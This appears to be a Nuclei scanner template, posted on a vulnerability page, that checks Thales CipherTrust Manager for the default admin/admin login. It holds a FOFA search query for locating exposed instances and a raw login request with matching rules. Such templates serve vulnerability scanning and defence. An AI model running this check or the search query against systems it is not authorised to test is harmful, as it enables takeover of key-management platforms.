漏洞描述
Attackers can control the entire platform through the default password (initpass) vulnerability, and use administrator privileges to operate core functions.
ciphertrust-default-login: Ciphertrust - Default Login
PoC代码[已公开]
id: ciphertrust-default-login
info:
name: Ciphertrust - Default Login
author: SleepingBag945
severity: high
description: |
Attackers can control the entire platform through the default password (initpass) vulnerability, and use administrator privileges to operate core functions.
reference:
- https://www.thalesdocs.com/ctp/cm/2.6/get_started/deployment/initial-password/index.html#:~:text=The%20username%20of%20the%20initial,to%20%22admin%22%20in%20lowercase.
metadata:
verified: true
max-request: 1
fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0="
tags: default-login,ciphertrust,vuln
http:
- raw:
- |
POST /api/v1/auth/tokens/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","connection":"local_account","password":"{{password}}","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 401'
- 'contains(body_1,"code") && contains(body_1,"message\":\"Password change required")'
condition: and
# digest: 490a00463044022079a90fad229a69318102d98dd26652898993d5b06ab9d8bc9df058375885d10e02207be521a79c3da3a095fafb5194df3d890c7982d2518fc5bb3c93771ebc34e4e9:922c64590222798bb761d5b6d8e72950